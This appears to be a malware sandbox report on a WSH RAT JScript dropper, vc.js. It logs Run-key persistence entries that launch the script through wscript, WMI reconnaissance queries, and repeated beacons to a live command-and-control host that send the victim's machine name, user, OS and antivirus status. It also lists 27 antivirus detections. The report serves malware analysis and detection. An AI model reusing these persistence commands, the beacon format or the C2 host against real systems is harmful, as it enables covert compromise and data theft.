reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fGxgS	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\fGxgS.js

Executes one or more WMI queries (4 events)

wmi	select * from antivirusproduct
wmi	select * from win32_process
wmi	select * from win32_operatingsystem
wmi	select * from win32_logicaldisk

wscript.exe-based dropper (JScript, VBS) (23 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (50 out of 115 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Oct. 6, 2023, 10:11 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 6, 2023, 10:11 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:11 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1116 sent: 321	1	321
send Oct. 6, 2023, 10:11 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 6, 2023, 10:11 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 6, 2023, 10:11 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:11 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1116 sent: 321	1	321
send Oct. 6, 2023, 10:11 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 6, 2023, 10:11 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 6, 2023, 10:11 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:11 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1116 sent: 321	1	321
send Oct. 6, 2023, 10:11 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 6, 2023, 10:11 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:11 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 6, 2023, 10:11 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:11 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1144 sent: 321	1	321
send Oct. 6, 2023, 10:11 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 648 sent: 321	1	321
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 416 sent: 321	1	321
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-processes flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-processes	1	13369356
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:12 a.m.	buffer: POST /is-processes HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 1481 Connection: Keep-Alive Cache-Control: no-cache socket: 756 sent: 328	1	328
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 756 sent: 321	1	321
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 756 sent: 321	1	321
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
InternetCrackUrlW Oct. 6, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 6, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1
send Oct. 6, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 6/10/2023\|JavaScript Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 756 sent: 321	1	321
send Oct. 6, 2023, 10:12 a.m.	buffer: ! socket: 1004 sent: 1	1	1

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
parent_process	wscript.exe	martian_process	wscript.exe //B "C:\Users\test22\AppData\Roaming\fGxgS.js"
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\fGxgS.js
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\fGxgS.js"

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

MicroWorld-eScan	JS:Trojan.Cryxos.5674
FireEye	JS:Trojan.Cryxos.5674
Arcabit	JS:Trojan.Cryxos.D162A [many]
Cyren	JS/Agent.AXL!Eldorado
Symantec	ISB.Downloader!gen52
ESET-NOD32	JS/TrojanDropper.Agent.OEY
Avast	JS:Crypt-Q [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Worm.Script.Dinihou.gen
BitDefender	JS:Trojan.Cryxos.5674
NANO-Antivirus	Trojan.Script.Dropper.jpdkao
F-Secure	Malware.JS/Dldr.G8
VIPRE	JS:Trojan.Cryxos.5674
TrendMicro	HEUR_JS.O.ELBP
McAfee-GW-Edition	BehavesLike.JS.Exploit.qm
Emsisoft	JS:Trojan.Cryxos.5674 (B)
Ikarus	Worm.JS.Wshrat
Avira	JS/Dldr.G8
Xcitium	TrojWare.JS.Crypt.BNB@8chm46
Microsoft	Trojan:JS/Obfuse.RVBD!MTB
ZoneAlarm	HEUR:Worm.Script.Dinihou.gen
GData	JS:Trojan.JS.Agent.TIW
Google	Detected
ALYac	JS:Trojan.JS.Agent.TIW
Rising	Dropper.Agent/JS!1.E4CE (CLASSIC)
MAX	malware (ai score=88)
AVG	JS:Crypt-Q [Trj]

vc.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All